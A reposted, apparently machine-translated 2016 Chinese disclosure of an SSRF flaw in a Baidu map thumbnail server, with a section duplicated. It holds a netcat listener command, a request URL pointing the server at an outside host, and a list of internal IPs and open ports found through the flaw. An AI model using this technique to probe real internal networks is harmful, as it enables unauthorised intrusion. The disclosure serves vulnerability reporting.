百度图片服务器的一处SSRF
漏洞标题 百度图片服务器的一处SSRF 相关厂商 百度 漏洞作者 李长歌 提交时间 2016-05-08 09:53 公开时间 2016-06-25 11:50 漏洞类型 设计缺陷/逻辑错误 危害等级…
漏洞标题
百度图像服务器的SSRF
相关制造商
百度
漏洞作者
李长歌
提交时间
2016-05-08 09: 53
公共时间
2016-06-25 11: 50
漏洞类型
设计缺陷/逻辑错误
危险等级
高
自我评估等级
10
漏洞状态
制造商已确认
标签标签
设计缺陷/边界旁路,不正确的设计,逻辑错误
漏洞详细信息
NC监视器在您自己的服务器上nc -l -vv 8081
http://webmap1.map.bdimg.com/maps/services/thumbnails?width=215&height=145&quality=120&align=middle,middle&src=http://101.200。**。**: 8081
Clientip显示为Intranet的随机IP
此连接中的src参数受到限制,Intranet地址也可用,并且存在SSRF漏洞。
连接存在访问400状态代码不存在返回200状态代码
漏洞证明:
只需扫描内部网的IP段10.50.40。×端口的打开状态。
10.50.40.4: 22
10.50.40.66: 22
10.50.40.52: 22
10.50.40.67: 22
10.50.40.103: 22
10.50.40.156: 22
10.50.40.234: 22
10.50.40.217: 22
10.50.40.47: 80
10.50.40.55: 80
10.50.40.87: 80
10.50.40.121: 80
当然,您也可以扫描其他漏洞。
修理计划:
修理
版权声明:请注明出处。李长歌@乌云
Clientip显示为Intranet的随机IP
此连接中的src参数受到限制,Intranet地址也可用,并且存在SSRF漏洞。
连接存在访问400状态代码不存在返回200状态代码
漏洞证明:
只需扫描内部网的IP段10.50.40。×端口的打开状态。
10.50.40.4: 22
10.50.40.66: 22
10.50.40.52: 22
10.50.40.67: 22
10.50.40.103: 22
10.50.40.156: 22
10.50.40.234: 22
10.50.40.217: 22
10.50.40.47: 80
10.50.40.55: 80
10.50.40.87: 80
10.50.40.121: 80
当然,您也可以扫描其他漏洞。
修理计划:
修理
版权声明:请注明出处。李长歌@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 551 )
- 分类:黑客技术
